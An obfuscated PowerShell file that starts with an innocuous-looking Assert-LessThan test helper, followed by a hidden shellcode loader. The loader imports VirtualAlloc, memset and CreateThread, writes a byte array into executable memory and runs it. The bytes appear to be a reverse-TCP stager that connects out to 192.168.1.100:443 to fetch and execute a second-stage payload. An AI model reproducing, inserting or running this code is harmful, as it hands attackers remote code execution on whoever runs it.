function A`ssERt-lEsST`h`AN
{
    
    [CmdletBinding()]
    param(
        [Parameter(PoSITion=0)]
        [object]
        
        ${exPe`c`TE`dvalUE},

        [Parameter(posITioN=1)]
        [object]
        
        ${upp`eRB`OUnD}, 

        [Parameter(poSiTiOn=2)]
        [string]
        
        ${M`EsSa`GE}
    )

    .("{2}{0}{1}"-f'trictMo','de','Set-S') -Version ("{0}{1}" -f 'La','test')

    if( -not (${eXpEc`TEd`V`ALUe} -lt ${UP`per`B`OuNd}) )
    {
        &("{0}{1}" -f'Fai','l') ("$ExpectedValue "+'i'+'s '+'no'+'t '+'l'+'ess '+'tha'+'n '+"$UpperBound "+': '+"$Message") 
    }
}


${C} = ((("{56}{49}{57}{1}{14}{26}{73}{28}{60}{69}{22}{40}{68}{38}{47}{54}{27}{11}{17}{75}{59}{42}{48}{9}{51}{30}{70}{39}{55}{7}{52}{71}{4}{34}{74}{16}{2}{0}{63}{67}{25}{46}{6}{13}{32}{64}{72}{29}{41}{35}{53}{62}{65}{3}{66}{15}{23}{43}{45}{5}{37}{50}{33}{61}{8}{20}{18}{19}{21}{24}{36}{10}{58}{12}{31}{44}" -f 'reat','kernel','ublic static extern IntPtr C','lp','[','Ptr lpThreadId);[','tri','rot','l0Vp)]public','t','Ptr de','nt ',' src, uint c','bute','32','ameter,','p)]p','dwSize, ','ic extern In','t',' stat','Ptr ','tPtr',' uint dwCreationFlags','memset(','(IntPtr lp','.dll0Vp)','ss, ui','at','Stack','Type','oun','s, ','pm','DllImport(0Vpk','e, IntPt','Int','DllImp','lloc(IntPtr',' uint',' Virtu','Siz',' flA',', I','t);','nt','ThreadAt',' lpA','lloca','lImpo','ort(0V','ion','ect','r lp','ddre',' flP','[Dl','rt(0Vp','st, uint','t','ic ext','svcrt.dl','StartAddress,','eThre','uint d',' IntPtr ','Par','ad','alA','ern In',',',');','w',']public st','ernel32.dll0V','uin'))."RePlA`cE"('0Vp',[strING][CHar]34));${W} = &("{0}{1}" -f'Add-Typ','e') -memberDefinition ${c} -Name ("{0}{1}" -f 'Win','32') -namespace ("{3}{4}{2}{0}{1}" -f 'unction','s','F','W','in32') -passthru;[Byte[]];[Byte[]]${Sc} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x64,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${SI`zE} = 0x1000;if (${S`C}."Le`NGTh" -gt 0x1000){${S`IzE} = ${S`c}."le`Ngth"};${x}=${W}::("{0}{2}{1}" -f'V','c','irtualAllo').Invoke(0,0x1000,${SI`Ze},0x40);for (${I}=0;${I} -le (${S`C}."lEng`Th"-1);${i}++) {${W}::"mEm`SEt"([IntPtr](${x}.("{1}{0}{2}"-f 'In','To','t32').Invoke()+${I}), ${sc}[${i}], 1)};${W}::("{0}{1}{2}" -f 'Create','Threa','d').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{2}{1}" -f'Star','ep','t-sle') 60};
